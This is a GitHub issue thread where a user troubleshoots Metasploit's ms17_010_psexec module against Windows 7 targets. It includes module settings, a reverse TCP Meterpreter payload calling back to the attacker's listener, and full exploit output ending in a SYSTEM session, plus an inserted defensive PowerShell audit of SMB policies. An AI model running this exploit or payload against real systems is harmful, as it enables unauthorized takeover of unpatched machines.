rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

The server responded with error: STATUS_ACCOUNT_RESTRICTION ms17_010_psexec #9766

Closed elibr1212 closed 6 years ago

elibr1212 commented 6 years ago

Why, when I only set the user, does it show me this? I understood that it was possible without a password. Is there even an article on how to use the script?

wvu commented 6 years ago

What named pipes did the exploit find?

wvu commented 6 years ago

Actually, paste all your output.

elibr1212 commented 6 years ago

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              true             yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   RHOST                 10.0.0.28        yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser               berkhim          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.14        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.14:4444 
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

I use Kali, and I did not set SMBPass; I set SMBUser. The Windows victim is Windows 7.

Auxilus commented 6 years ago

Is setting SMBUser causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION? Also, does the exploit work without setting SMBUser?

Auxilus commented 6 years ago

STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.

elibr1212 commented 6 years ago

Also does the exploit work without setting SMBUser ?

On Windows XP I tried without setting a username and password and it succeeded, but on Windows 7 it did not work for me, and I saw in another video that it did work. Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s That's why it's confusing.

Auxilus commented 6 years ago

What error does it give when you try it without setting SMBUser?

elibr1212 commented 6 years ago

msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

Auxilus commented 6 years ago

Have you checked if the target is vulnerable to ms17_010?

Auxilus commented 6 years ago

Detecting an accessible named pipe is, I think, the entry point; if the exploit doesn't find one, then I'm afraid it won't work at all.

elibr1212 commented 6 years ago

Yes. Yes, it's my little brother's computer and I'm learning with it, so I opened port 445 from the beginning.

msf > clear
[*] exec: clear

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.0.0.28
rhosts => 10.0.0.28
msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) >

wvu commented 6 years ago

set VERBOSE true and try again, @elibr1212.

elibr1212 commented 6 years ago

msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1 
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.15:4444 
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) > 

wvu commented 6 years ago

What named pipes did the exploit find?

So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.

elibr1212 commented 6 years ago

"You either need creds, anonymous access": how do I do it?

wvu commented 6 years ago

If you control the box you're testing, you can use known creds or enable anonymous access via https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously.
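Added defender-side example, not from this thread or the Metasploit project: a PowerShell audit of the two host settings discussed above, the blank-password restriction behind STATUS_ACCOUNT_RESTRICTION and the anonymous named-pipe policy. It assumes the registry locations below back those policies, and the pipe list is taken from the debug trace earlier in the thread.

```powershell
# Added example (not from the thread or the Metasploit project). Run locally as
# an administrator. Assumption: these registry values back the policies
#   "Accounts: Limit local account use of blank passwords to console logon only"
#   "Network access: Named pipes that can be accessed anonymously"
$lsa    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# Pipes the module's debug trace probed on the Windows 7 target in this thread.
$probedPipes = @('netlogon','lsarpc','samr','browser','atsvc','epmapper',
                 'eventlog','ntsvcs','srvsvc','wkssvc','svcctl')

function Get-RegValue([string]$Path, [string]$Name) {
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # value absent => the Windows default applies
}

# 1 (default) => accounts with a blank password may only log on at the console,
# which is what yields STATUS_ACCOUNT_RESTRICTION over SMB. 0 => accepted remotely.
$limitBlank = Get-RegValue $lsa 'LimitBlankPasswordUse'
if ($null -eq $limitBlank) { $limitBlank = 1 }

# 1 (default) => null-session (anonymous) users are restricted on the server.
$restrictNull = Get-RegValue $lanman 'RestrictNullSessAccess'
if ($null -eq $restrictNull) { $restrictNull = 1 }

# Multi-string list of pipes reachable without authentication (often empty).
$nullPipes = @(Get-RegValue $lanman 'NullSessionPipes') | Where-Object { $_ }

[pscustomobject]@{
    BlankPasswordRemoteLogon = ($limitBlank -eq 0)
    NullSessionRestricted    = ($restrictNull -eq 1)
    AnonymousPipes           = ($nullPipes -join ',')
}

# Report any probed pipe the host currently hands out to anonymous callers.
$exposed = $probedPipes | Where-Object { $nullPipes -contains $_ }
if ($exposed) {
    Write-Warning ('Pipes open to null sessions: ' + ($exposed -join ', '))
} else {
    Write-Output 'No probed pipe is open to null sessions; unauthenticated access should fail as in the thread.'
}
```

A listed pipe is only reachable if the service behind it is running, so the audit reports policy exposure, not a live connection test.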

Auxilus commented 6 years ago

@wvu-r7 do we need to add named pipes like COMNAP and COMNODE, described in the above article, to the list?

elibr1212 commented 6 years ago

"If you control the box you're testing": yes. Now I checked the computer and I see that the sharing service is not running, and when I try to start it in "services" it does not let me turn it on. And I'll look at what you sent. Well done for the work you do! It's not taken for granted. You are champions.

wvu commented 6 years ago

Probably not if they're for IBM mainframes. :P

elibr1212 commented 6 years ago

I opened a virtual machine (Windows 7 x86) now, lol. And it worked:

[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] 10.0.0.21:445 - Connected to named pipe: epmapper
[*] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8
[*] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020
[*] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8
[*] 10.0.0.21:445 - Attempting leak #0
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x97353028
[*] 10.0.0.21:445 - InParam: 0x9e2c20dc
[*] 10.0.0.21:445 - MID: 0xb03
[-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8
[*] 10.0.0.21:445 - Align transaction and leak failed, attempt #0
[*] 10.0.0.21:445 - Attempting leak #1
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x9e2d4050
[*] 10.0.0.21:445 - InParam: 0x9e2ce0dc
[*] 10.0.0.21:445 - MID: 0xb03
[*] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion
[*] 10.0.0.21:445 - Control of groom transaction
[*] 10.0.0.21:445 - Built a write-what-where primitive...
[*] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee
[*] 10.0.0.21:445 - Session Data: (omitted)
[*] 10.0.0.21:445 - session dat len = 256
[*] 10.0.0.21:445 - Session ctx offset = 80
[*] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00
[*] 10.0.0.21:445 - secCtxAddr: 9e2837d8
[*] 10.0.0.21:445 - Reading secCtxData from 9e2837d8
[*] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000
[*] 10.0.0.21:445 - Overwrote token SID security context with fake context
[+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.0.0.21:445 - PowerShell found
[*] 10.0.0.21:445 - Selecting PowerShell target
[*] 10.0.0.21:445 - Powershell command length: 2404
[*] 10.0.0.21:445 - Executing the payload...
[*] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Obtaining a service manager handle...
[*] 10.0.0.21:445 - Creating the service...
[+] 10.0.0.21:445 - Successfully created the service
[*] 10.0.0.21:445 - Starting the service...
[+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.0.0.21:445 - Removing the service...
[+] 10.0.0.21:445 - Successfully removed the service
[*] 10.0.0.21:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 10.0.0.21
[+] 10.0.0.21:445 - SYSTEM session cleaned up.
[*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300

meterpreter > sysinfo
Computer        : WIN-IUAS33RLC03
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : he_IL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

wvu commented 6 years ago

Did you read the module doc? info -d may have been helpful.

elibr1212 commented 6 years ago

I did it through anonymous access as you said. And yes, thanks.